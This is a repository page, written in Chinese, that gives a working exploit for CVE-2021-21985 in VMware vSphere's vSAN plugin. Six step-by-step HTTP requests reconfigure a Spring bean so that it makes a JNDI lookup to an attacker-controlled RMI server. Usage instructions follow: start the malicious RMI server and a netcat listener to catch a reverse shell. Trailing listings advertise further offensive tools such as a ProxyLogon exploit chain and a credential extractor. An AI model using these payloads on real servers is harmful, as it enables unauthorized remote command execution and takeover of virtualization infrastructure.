cve-2021-21985 exploit

0x01 漏洞点

分析可见：

https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis

0x02 exploit

对beans对象进行重新构造，实现rce。

bean列表：

localizedMessageBundle
vsanWorkerThreadFactory
vsanThreadPoolImpl
vsanServiceBundleActivator
vsanServiceFactory
vsanProviderUtils_setVmodlHelper
vsanProviderUtils_setVsanServiceFactory
vsanQueryUtil_setDataService
vsanComponentsProviderImpl
capabilityPropertyProviderImpl
pbmDataProviderImpl
vsanCapabilityCacheManager
vsanCapabilityUtils_setVsanCapabilityCacheManager
vsanUtils_setMessageBundle
vsanFormatUtils_setUserSessionService

随风大佬使用的vsanProviderUtils_setVmodlHelper在我这边环境没测试成功，就选用了另外的bean进行测试，由于Vsphere UI使用的tomcat中间件，可以通过jndi rmi bypass(https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java）远程执行命令。

Step1
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject
{"methodInput":[null]}


Step2
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod
{"methodInput":["javax.naming.InitialContext.doLookup"]}

Step3
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod
{"methodInput":["doLookup"]}

Step4 
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments
{"methodInput":[["rmi://attip:1097/ExecByEL"]]}

Step5
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare
{"methodInput":[]}

Step6
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke
{"methodInput":[]}

0x03 使用方法

启动rmi服务 java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip
启动reverse shell 侦听

nc -lvvp 5555

执行以上payload，得到reverse shell

cve-2021-21985 exploit

Related tags

Overview

cve-2021-21985 exploit

0x01 漏洞点

0x02 exploit

0x03 使用方法

0x04 reference

Owner

xnianq

一款针对向日葵的识别码和验证码提取工具

A tool combined with the advantages of masscan and nmap

A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks

Notebooks, slides and dataset of the CorrelAid Machine Learning Winter School

This respository contains the source code of the printjack and phonejack attacks.

Implementation of RITA (Real Intelligence Threat Analytics) in Jupyter Notebook with improved scoring algorithm.

ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

Automatically fetch, measure, and merge subscription links on the network, use Github Action

Tools for investigating Log4j CVE-2021-44228

Bandit is a tool designed to find common security issues in Python code.

Dark-Fb No Login 100% safe

Simple python script for generating custom high-secure passwords for securing your social-apps ❤️

A burp-suite plugin that extract all parameter names from in-scope requests

Malware-analysis-writeups - Some of my Malware Analysis writeups

proxyshell payload generate

Obfuscate your Python scripts better, faster.

Domain abuse scanner covering domainsquatting and phishing keywords.

GitLab CI security tools runner

A simple password generator using Python Tkinter.

Pgen is the best brute force password generator and it is improved from the cupp.py